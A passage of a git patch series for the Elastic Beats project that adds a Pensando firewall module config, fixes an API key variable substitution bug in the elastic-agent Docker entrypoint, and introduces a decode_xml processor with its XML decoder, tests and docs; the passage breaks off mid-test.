"eJy0k92qnDAQx+99inmBsw/gRaGwHOhFYekp9FJSM3HDiU5IRmTfviSrbrSR/aidy5n4//+cjzf4xEsJFjsvOkkFAGs2WMJpzEABINHXTlvW1JXwpQCA+QP4TrI3WAAojUb6MlbfoBMtLmRD8MViCY2j3o6ZjHKI96gFylF7AzHU+MP4JDVLDaUaYE7mDEM4NCg8lvAbWSR5iUr0hqsoXoISxuOinGVNcMndaI/vv5Ina96UWdRBclGayD/xMpCTq9o2SIyvUQ+oAz4jKEPDAfLG1lZ6LX411h1jgw6edLbW6FpE+2/HvKlEz7qLbyohpUPv1y6Lf38WYZQklTptNCBlseQ4D/JaL05B7zEK7fA6sv124DhrkprXIG9vHTHVZHZ0P02Sd81db7DSfw35XzbgR28wbB+fBcMgPLSC6zPKje579D7Mfwvitel/XFUDx90eTASeBeOOjZgYom6KsdUJ6l2N/+MoP6IyiNttPoay902OHHY8zTsQrFv0LFqbR5Chq8/5/5wVR3dDzQGKPwEAAP//dBvr3Q==" +} diff --git a/filebeat/module/pensando/module.yml b/filebeat/module/pensando/module.yml new file mode 100644 index 000000000000..ed97d539c095 --- /dev/null +++ b/filebeat/module/pensando/module.yml @@ -0,0 +1 @@ +--- diff --git a/filebeat/modules.d/pensando.yml.disabled b/filebeat/modules.d/pensando.yml.disabled new file mode 100644 index 000000000000..72350a5dcb69 --- /dev/null +++ b/filebeat/modules.d/pensando.yml.disabled @@ -0,0 +1,13 @@ +# Module: pensando +# Docs: https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-pensando.html + +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: diff --git a/x-pack/filebeat/filebeat.reference.yml b/x-pack/filebeat/filebeat.reference.yml index c9e00d6993de..177184270990 100644 --- a/x-pack/filebeat/filebeat.reference.yml +++ b/x-pack/filebeat/filebeat.reference.yml @@ -1649,6 +1649,18 @@ filebeat.modules: #var.external_zones: +#------------------------------- Pensando Module ------------------------------- +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: + #------------------------------ PostgreSQL Module ------------------------------ #- module: postgresql # Logs From 8ea9a9597d32188f66d5006aa3e18326578599db Mon Sep 17 00:00:00 2001 From: Marcin Tojek Date: Mon, 15 Feb 2021 19:05:16 +0100 Subject: [PATCH 45/63] Fix: bad substitution of API key (#24036) * Fix: bad substitution of API key * Update changelog --- .../templates/docker/docker-entrypoint.elastic-agent.tmpl | 2 +- x-pack/elastic-agent/CHANGELOG.next.asciidoc | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl b/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl index c51a13432579..348a99dea4c9 100644 --- a/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl +++ b/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl @@ -40,7 +40,7 @@ function enroll(){ local apikeyId=$(echo $enrollResp | jq -r '.list[] | select((.name | startswith("Default ")) and (.active == true)) | .id') echo $apikeyId - if [[ -z "${$apikeyId}" ]]; then + if [[ -z "${apikeyId}" ]]; then echo "Default agent policy was not found. Please consider using own enrollment token (FLEET_ENROLLMENT_TOKEN)." exit 1 fi diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index 7c1d714e7c4b..cce864723f3a 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -39,6 +39,7 @@ - Increase checkin grace period to 30 seconds {pull}23568[23568] - Fix libbeat from reporting back degraded on config update {pull}23537[23537] - Fix issues with dynamic inputs and conditions {pull}23886[23886] +- Fix bad substitution of API key. {pull}24036[24036] ==== New features From 6839307c158d2e0a6b7db7f850033028b4c97b27 Mon Sep 17 00:00:00 2001 From: Marius Iversen Date: Mon, 15 Feb 2021 21:35:06 +0100 Subject: [PATCH 46/63] [Libbeat][New Processor] XML Decode (#23678) * stashing before initial commit * Initial commit * updating go.sum * updating it again * adding feedback from PR comments and removing expandkeys config entry * Updating changelog * removing expanded_keys from allowed fields * adding new changes based on PR comments, a few more changes remains * moving the xml decoder to its own subpackage based on PR comments * reverting back to Target being a string pointer, to be able to differentiate between null and empty string * Updating certain tests to fit the new ignore_failure and ignore_missing options * Updating unit test to test with missing field * updating license headers * adding benchmark test * benchmark, now also with allocation results * updating changelog entry * removing duplicate Changelog entry * changing changelog entry name to new name * Simplify error handling and fix race $ benchcmp old.txt new.txt benchmark old ns/op new ns/op delta BenchmarkProcessor_Run/single_object-12 15691 15686 -0.03% BenchmarkProcessor_Run/nested_and_array_object-12 39673 39098 -1.45% benchmark old allocs new allocs delta BenchmarkProcessor_Run/single_object-12 158 158 +0.00% BenchmarkProcessor_Run/nested_and_array_object-12 376 374 -0.53% benchmark old bytes new bytes delta BenchmarkProcessor_Run/single_object-12 8597 8597 +0.00% BenchmarkProcessor_Run/nested_and_array_object-12 20310 19798 -2.52% * internal xml to json implementation * Use internal xml to json decoder benchmark old ns/op new ns/op delta BenchmarkProcessor_Run/single_object-12 15686 8051 -48.67% BenchmarkProcessor_Run/nested_and_array_object-12 39098 20540 -47.47% benchmark old allocs new allocs delta BenchmarkProcessor_Run/single_object-12 158 75 -52.53% BenchmarkProcessor_Run/nested_and_array_object-12 374 184 -50.80% benchmark old bytes new bytes delta BenchmarkProcessor_Run/single_object-12 8597 3520 -59.06% BenchmarkProcessor_Run/nested_and_array_object-12 19798 7824 -60.48% benchmark old ns/op new ns/op delta BenchmarkProcessor_Run/single_object-12 15686 8051 -48.67% BenchmarkProcessor_Run/nested_and_array_object-12 39098 20540 -47.47% benchmark old allocs new allocs delta BenchmarkProcessor_Run/single_object-12 158 75 -52.53% BenchmarkProcessor_Run/nested_and_array_object-12 374 184 -50.80% benchmark old bytes new bytes delta BenchmarkProcessor_Run/single_object-12 8597 3520 -59.06% BenchmarkProcessor_Run/nested_and_array_object-12 19798 7824 -60.48% * changelog fix * Update docs * Add godoc example of xml to json * updating test name to fit Example naming convention Co-authored-by: Andrew Kroh --- CHANGELOG.next.asciidoc | 1 + libbeat/cmd/instance/imports_common.go | 1 + libbeat/common/encoding/xml/decode.go | 120 +++++ libbeat/common/encoding/xml/decode_test.go | 431 ++++++++++++++++ libbeat/docs/processors-list.asciidoc | 6 + libbeat/processors/decode_xml/config.go | 36 ++ libbeat/processors/decode_xml/decode_xml.go | 150 ++++++ .../processors/decode_xml/decode_xml_test.go | 467 ++++++++++++++++++ .../decode_xml/docs/decode_xml.asciidoc | 115 +++++ 9 files changed, 1327 insertions(+) create mode 100644 libbeat/common/encoding/xml/decode.go create mode 100644 libbeat/common/encoding/xml/decode_test.go create mode 100644 libbeat/processors/decode_xml/config.go create mode 100644 libbeat/processors/decode_xml/decode_xml.go create mode 100644 libbeat/processors/decode_xml/decode_xml_test.go create mode 100644 libbeat/processors/decode_xml/docs/decode_xml.asciidoc diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 1759d22c0282..22d95586bc5a 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -598,6 +598,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] - Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] - Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] +- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] - Add deployment name in pod's meta. {pull}23610[23610] - Add `selector` information in kubernetes services' metadata. {pull}23730[23730] diff --git a/libbeat/cmd/instance/imports_common.go b/libbeat/cmd/instance/imports_common.go index e47dbf937993..ac767a559645 100644 --- a/libbeat/cmd/instance/imports_common.go +++ b/libbeat/cmd/instance/imports_common.go @@ -30,6 +30,7 @@ import ( _ "github.com/elastic/beats/v7/libbeat/processors/add_process_metadata" _ "github.com/elastic/beats/v7/libbeat/processors/communityid" _ "github.com/elastic/beats/v7/libbeat/processors/convert" + _ "github.com/elastic/beats/v7/libbeat/processors/decode_xml" _ "github.com/elastic/beats/v7/libbeat/processors/dissect" _ "github.com/elastic/beats/v7/libbeat/processors/dns" _ "github.com/elastic/beats/v7/libbeat/processors/extract_array" diff --git a/libbeat/common/encoding/xml/decode.go b/libbeat/common/encoding/xml/decode.go new file mode 100644 index 000000000000..665c0608f67e --- /dev/null +++ b/libbeat/common/encoding/xml/decode.go @@ -0,0 +1,120 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package xml + +import ( + "bytes" + "encoding/xml" + "io" + "strings" +) + +// A Decoder reads and decodes XML from an input stream. +type Decoder struct { + prependHyphenToAttr bool + lowercaseKeys bool + xmlDec *xml.Decoder +} + +// NewDecoder returns a new decoder that reads from r. +func NewDecoder(r io.Reader) *Decoder { + return &Decoder{xmlDec: xml.NewDecoder(r)} +} + +// PrependHyphenToAttr causes the Decoder to prepend a hyphen ('-') to to all +// XML attribute names. +func (d *Decoder) PrependHyphenToAttr() { d.prependHyphenToAttr = true } + +// LowercaseKeys causes the Decoder to transform all key name to lowercase. +func (d *Decoder) LowercaseKeys() { d.lowercaseKeys = true } + +// Decode reads XML from the input stream and return a map containing the data. +func (d *Decoder) Decode() (map[string]interface{}, error) { + _, m, err := d.decode(nil) + return m, err +} + +func (d *Decoder) decode(attrs []xml.Attr) (string, map[string]interface{}, error) { + elements := map[string]interface{}{} + var cdata string + + for { + t, err := d.xmlDec.Token() + if err != nil { + if err == io.EOF { + return "", elements, nil + } + return "", nil, err + } + + switch elem := t.(type) { + case xml.StartElement: + cdata, subElements, err := d.decode(elem.Attr) + if err != nil { + return "", nil, err + } + + // Combine sub-elements and cdata. + var add interface{} = subElements + if len(subElements) == 0 { + add = cdata + } else if len(cdata) > 0 { + subElements["#text"] = cdata + } + + // Add the data to the current object while taking into account + // if the current key already exists (in the case of lists). + key := d.key(elem.Name.Local) + value := elements[elem.Name.Local] + switch v := value.(type) { + case nil: + elements[key] = add + case []interface{}: + elements[key] = append(v, add) + default: + elements[key] = []interface{}{v, add} + } + case xml.CharData: + cdata = string(bytes.TrimSpace(elem.Copy())) + case xml.EndElement: + d.addAttributes(attrs, elements) + return cdata, elements, nil + } + } +} + +func (d *Decoder) addAttributes(attrs []xml.Attr, m map[string]interface{}) { + for _, attr := range attrs { + key := d.attrKey(attr.Name.Local) + m[key] = attr.Value + } +} + +func (d *Decoder) key(in string) string { + if d.lowercaseKeys { + return strings.ToLower(in) + } + return in +} + +func (d *Decoder) attrKey(in string) string { + if d.prependHyphenToAttr { + return d.key("-" + in) + } + return d.key(in) +} diff --git a/libbeat/common/encoding/xml/decode_test.go b/libbeat/common/encoding/xml/decode_test.go new file mode 100644 index 000000000000..277972e56da6 --- /dev/null +++ b/libbeat/common/encoding/xml/decode_test.go @@ -0,0 +1,431 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// +build !integration + +package xml + +import ( + "encoding/json" + "fmt" + "os" + "strings" + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" +) + +func TestIncompleteXML(t *testing.T) { + const xml = ` + + John +` + + d := NewDecoder(strings.NewReader(xml)) + out, err := d.Decode() + assert.Nil(t, out) + require.Error(t, err) + assert.Contains(t, err.Error(), "unexpected EOF") +} + +func TestLowercaseKeys(t *testing.T) { + const xml = ` + + John + +` + + expected := map[string]interface{}{ + "person": map[string]interface{}{ + "name": map[string]interface{}{ + "#text": "John", + "id": "123", + }, + }, + } + + d := NewDecoder(strings.NewReader(xml)) + d.LowercaseKeys() + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestPrependHyphenToAttr(t *testing.T) { + const xml = ` + + John + +` + + expected := map[string]interface{}{ + "person": map[string]interface{}{ + "Name": map[string]interface{}{ + "#text": "John", + "-ID": "123", + }, + }, + } + + d := NewDecoder(strings.NewReader(xml)) + d.PrependHyphenToAttr() + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestDecodeList(t *testing.T) { + const xml = ` + + + John + + + Jane + + Foo + +` + + expected := map[string]interface{}{ + "people": map[string]interface{}{ + "person": []interface{}{ + map[string]interface{}{ + "Name": map[string]interface{}{ + "#text": "John", + "ID": "123", + }, + }, + map[string]interface{}{ + "Name": map[string]interface{}{ + "#text": "Jane", + "ID": "456", + }, + }, + "Foo", + }, + }, + } + + d := NewDecoder(strings.NewReader(xml)) + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestEmptyElement(t *testing.T) { + const xml = ` + + +` + + expected := map[string]interface{}{ + "people": "", + } + + d := NewDecoder(strings.NewReader(xml)) + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestDecode(t *testing.T) { + type testCase struct { + XML string + Output map[string]interface{} + } + + tests := []testCase{ + { + XML: ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions"}}}, + }, + { + XML: ` + + + Gambardella, Matthew + XML Developer's Guide + Computer + 44.95 + 2000-10-01 + An in-depth look at creating applications with XML. + + + Ralls, Kim + Midnight Rain + Fantasy + 5.95 + 2000-12-16 + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "Gambardella, Matthew", + "description": "An in-depth look at creating applications with XML.", + "genre": "Computer", + "id": "bk101", + "price": "44.95", + "publish_date": "2000-10-01", + "title": "XML Developer's Guide", + }, + map[string]interface{}{ + "author": "Ralls, Kim", + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "genre": "Fantasy", + "id": "bk102", + "price": "5.95", + "publish_date": "2000-12-16", + "title": "Midnight Rain"}}}}, + }, + { + XML: ` + + + + Gambardella, Matthew + XML Developer's Guide + Computer + 44.95 + 2000-10-01 + An in-depth look at creating applications with XML. + + + Ralls, Kim + Midnight Rain + Fantasy + 5.95 + 2000-12-16 + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "Gambardella, Matthew", + "description": "An in-depth look at creating applications with XML.", + "genre": "Computer", + "id": "bk101", + "price": "44.95", + "publish_date": "2000-10-01", + "title": "XML Developer's Guide"}, + map[string]interface{}{ + "author": "Ralls, Kim", + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "genre": "Fantasy", + "id": "bk102", + "price": "5.95", + "publish_date": "2000-12-16", + "title": "Midnight Rain"}}}}, + }, + { + XML: ` + + + + Gambardella, Matthew + XML Developer's Guide + Computer + 44.95 + 2000-10-01 + An in-depth look at creating applications with XML. + + + + Ralls, Kim + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "Gambardella, Matthew", + "description": "An in-depth look at creating applications with XML.", + "genre": "Computer", + "id": "bk101", + "price": "44.95", + "publish_date": "2000-10-01", + "title": "XML Developer's Guide"}, + "secondcategory": map[string]interface{}{ + "paper": map[string]interface{}{ + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "id": "bk102", + "test2": "Ralls, Kim"}}}}, + }, + } + + for i, test := range tests { + t.Run(fmt.Sprintf("%d", i), func(t *testing.T) { + d := NewDecoder(strings.NewReader(test.XML)) + d.LowercaseKeys() + + out, err := d.Decode() + require.NoError(t, err) + assert.EqualValues(t, test.Output, out) + }) + } +} + +func ExampleDecoder_Decode() { + const xml = ` + + + + 91 + 1 + 4 + 9 + 0 + 0x8020000000000000 + + 100 + + + Microsoft-Windows-WinRM/Operational + vagrant-2012-r2 + + + + winlogbeat + running + 770069006E006C006F00670062006500610074002F0034000000 + + + + \\VAGRANT-2012-R2 + vagrant + + + + 15005 + shellId + 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000 + + + Creating WSMan shell on server with ResourceUri: %1 + Information + Request handling + Info + Microsoft-Windows-WinRM/Operational + Microsoft-Windows-Windows Remote Management + + Server + + + +} +` + dec := NewDecoder(strings.NewReader(xml)) + dec.LowercaseKeys() + m, err := dec.Decode() + if err != nil { + return + } + + enc := json.NewEncoder(os.Stdout) + enc.SetIndent("", " ") + if err = enc.Encode(m); err != nil { + return + } + + // Output: + // { + // "event": { + // "eventdata": { + // "binary": "770069006E006C006F00670062006500610074002F0034000000", + // "data": { + // "#text": "running", + // "name": "param2" + // } + // }, + // "processingerrordata": { + // "dataitemname": "shellId", + // "errorcode": "15005", + // "eventpayload": "68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000" + // }, + // "renderinginfo": { + // "channel": "Microsoft-Windows-WinRM/Operational", + // "culture": "en-US", + // "keywords": { + // "keyword": "Server" + // }, + // "level": "Information", + // "message": "Creating WSMan shell on server with ResourceUri: %1", + // "opcode": "Info", + // "provider": "Microsoft-Windows-Windows Remote Management", + // "task": "Request handling" + // }, + // "system": { + // "channel": "Microsoft-Windows-WinRM/Operational", + // "computer": "vagrant-2012-r2", + // "correlation": { + // "activityid": "{A066CCF1-8AB3-459B-B62F-F79F957A5036}", + // "relatedactivityid": "{85FC0930-9C49-42DA-804B-A7368104BD1B}" + // }, + // "eventid": "91", + // "eventrecordid": "100", + // "execution": { + // "processid": "920", + // "threadid": "1152" + // }, + // "keywords": "0x8020000000000000", + // "level": "4", + // "opcode": "0", + // "provider": { + // "eventsourcename": "Service Control Manager", + // "guid": "{a7975c8f-ac13-49f1-87da-5a984a4ab417}", + // "name": "Microsoft-Windows-WinRM" + // }, + // "security": { + // "userid": "S-1-5-21-3541430928-2051711210-1391384369-1001" + // }, + // "task": "9", + // "timecreated": { + // "systemtime": "2016-01-28T20:33:27.990735300Z" + // }, + // "version": "1" + // }, + // "userdata": { + // "eventxml": { + // "servername": "\\\\VAGRANT-2012-R2", + // "username": "vagrant", + // "xmlns": "Event_NS" + // } + // }, + // "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + // } + // } +} diff --git a/libbeat/docs/processors-list.asciidoc b/libbeat/docs/processors-list.asciidoc index 367bce4ae592..e2670ebc39e3 100644 --- a/libbeat/docs/processors-list.asciidoc +++ b/libbeat/docs/processors-list.asciidoc @@ -110,6 +110,9 @@ endif::[] ifndef::no_urldecode_processor[] * <> endif::[] +ifndef::no_decode_xml_processor[] +* <> +endif::[] //# end::processors-list[] //# tag::processors-include[] @@ -225,5 +228,8 @@ endif::[] ifndef::no_urldecode_processor[] include::{libbeat-processors-dir}/urldecode/docs/urldecode.asciidoc[] endif::[] +ifndef::no_decode_xml_processor[] +include::{libbeat-processors-dir}/decode_xml/docs/decode_xml.asciidoc[] +endif::[] //# end::processors-include[] diff --git a/libbeat/processors/decode_xml/config.go b/libbeat/processors/decode_xml/config.go new file mode 100644 index 000000000000..289b2eaa0e97 --- /dev/null +++ b/libbeat/processors/decode_xml/config.go @@ -0,0 +1,36 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +type decodeXMLConfig struct { + Field string `config:"field" validate:"required"` + Target *string `config:"target_field"` + OverwriteKeys bool `config:"overwrite_keys"` + DocumentID string `config:"document_id"` + ToLower bool `config:"to_lower"` + IgnoreMissing bool `config:"ignore_missing"` + IgnoreFailure bool `config:"ignore_failure"` +} + +func defaultConfig() decodeXMLConfig { + return decodeXMLConfig{ + Field: "message", + OverwriteKeys: true, + ToLower: true, + } +} diff --git a/libbeat/processors/decode_xml/decode_xml.go b/libbeat/processors/decode_xml/decode_xml.go new file mode 100644 index 000000000000..0b229cff3d23 --- /dev/null +++ b/libbeat/processors/decode_xml/decode_xml.go @@ -0,0 +1,150 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "encoding/json" + "errors" + "fmt" + "strings" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/cfgwarn" + "github.com/elastic/beats/v7/libbeat/common/encoding/xml" + "github.com/elastic/beats/v7/libbeat/common/jsontransform" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/libbeat/processors" + "github.com/elastic/beats/v7/libbeat/processors/checks" + jsprocessor "github.com/elastic/beats/v7/libbeat/processors/script/javascript/module/processor" +) + +type decodeXML struct { + decodeXMLConfig + log *logp.Logger +} + +var ( + errFieldIsNotString = errors.New("field value is not a string") +) + +const ( + procName = "decode_xml" + logName = "processor." + procName +) + +func init() { + processors.RegisterPlugin(procName, + checks.ConfigChecked(New, + checks.RequireFields("fields"), + checks.AllowedFields("fields", "overwrite_keys", "add_error_key", "target", "document_id"))) + jsprocessor.RegisterPlugin(procName, New) +} + +// New constructs a new decode_xml processor. +func New(c *common.Config) (processors.Processor, error) { + config := defaultConfig() + + if err := c.Unpack(&config); err != nil { + return nil, fmt.Errorf("fail to unpack the "+procName+" processor configuration: %s", err) + } + + return newDecodeXML(config) +} + +func newDecodeXML(config decodeXMLConfig) (processors.Processor, error) { + cfgwarn.Experimental("The " + procName + " processor is experimental.") + + // Default target to overwriting field. + if config.Target == nil { + config.Target = &config.Field + } + + return &decodeXML{ + decodeXMLConfig: config, + log: logp.NewLogger(logName), + }, nil +} + +func (x *decodeXML) Run(event *beat.Event) (*beat.Event, error) { + if err := x.run(event); err != nil && !x.IgnoreFailure { + err = fmt.Errorf("failed in decode_xml on the %q field: %w", x.Field, err) + event.PutValue("error.message", err.Error()) + return event, err + } + return event, nil +} + +func (x *decodeXML) run(event *beat.Event) error { + data, err := event.GetValue(x.Field) + if err != nil { + if x.IgnoreMissing && err == common.ErrKeyNotFound { + return nil + } + return err + } + + text, ok := data.(string) + if !ok { + return errFieldIsNotString + } + + xmlOutput, err := x.decodeField(text) + if err != nil { + return err + } + + var id string + if tmp, err := common.MapStr(xmlOutput).GetValue(x.DocumentID); err == nil { + if v, ok := tmp.(string); ok { + id = v + common.MapStr(xmlOutput).Delete(x.DocumentID) + } + } + + if *x.Target != "" { + if _, err = event.PutValue(*x.Target, xmlOutput); err != nil { + return fmt.Errorf("failed to put value %v into field %q: %w", xmlOutput, *x.Target, err) + } + } else { + jsontransform.WriteJSONKeys(event, xmlOutput, false, x.OverwriteKeys, !x.IgnoreFailure) + } + + if id != "" { + event.SetID(id) + } + return nil +} + +func (x *decodeXML) decodeField(data string) (decodedData map[string]interface{}, err error) { + dec := xml.NewDecoder(strings.NewReader(data)) + if x.ToLower { + dec.LowercaseKeys() + } + + out, err := dec.Decode() + if err != nil { + return nil, fmt.Errorf("error decoding XML field: %w", err) + } + return out, nil +} + +func (x *decodeXML) String() string { + json, _ := json.Marshal(x.decodeXMLConfig) + return procName + "=" + string(json) +} diff --git a/libbeat/processors/decode_xml/decode_xml_test.go b/libbeat/processors/decode_xml/decode_xml_test.go new file mode 100644 index 000000000000..26d075bf3a47 --- /dev/null +++ b/libbeat/processors/decode_xml/decode_xml_test.go @@ -0,0 +1,467 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/common" +) + +var ( + testXMLTargetField = "xml" + testRootTargetField = "" +) + +func TestDecodeXML(t *testing.T) { + var testCases = []struct { + description string + config decodeXMLConfig + Input common.MapStr + Output common.MapStr + error bool + errorMessage string + }{ + { + description: "Simple xml decode with target field set", + config: decodeXMLConfig{ + Field: "message", + Target: &testXMLTargetField, + }, + Input: common.MapStr{ + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + Output: common.MapStr{ + "xml": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions", + }, + }, + }, + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + }, + { + description: "Test with target set to root", + config: decodeXMLConfig{ + Field: "message", + Target: &testRootTargetField, + }, + Input: common.MapStr{ + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + Output: common.MapStr{ + "catalog": common.MapStr{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions", + }, + }, + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + }, + { + description: "Simple xml decode with xml string to same field name when Target is null", + config: decodeXMLConfig{ + Field: "message", + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + Output: common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions", + }, + }, + }, + }, + }, + { + description: "Decoding with array input", + config: decodeXMLConfig{ + Field: "message", + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + + Ralls, Kim + Midnight Rain + Some review. + + `, + }, + Output: common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "title": "The Recognitions", + }, + map[string]interface{}{ + "author": "Ralls, Kim", + "review": "Some review.", + "title": "Midnight Rain", + }, + }, + }, + }, + }, + }, + { + description: "Decoding with multiple xml objects", + config: decodeXMLConfig{ + Field: "message", + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + 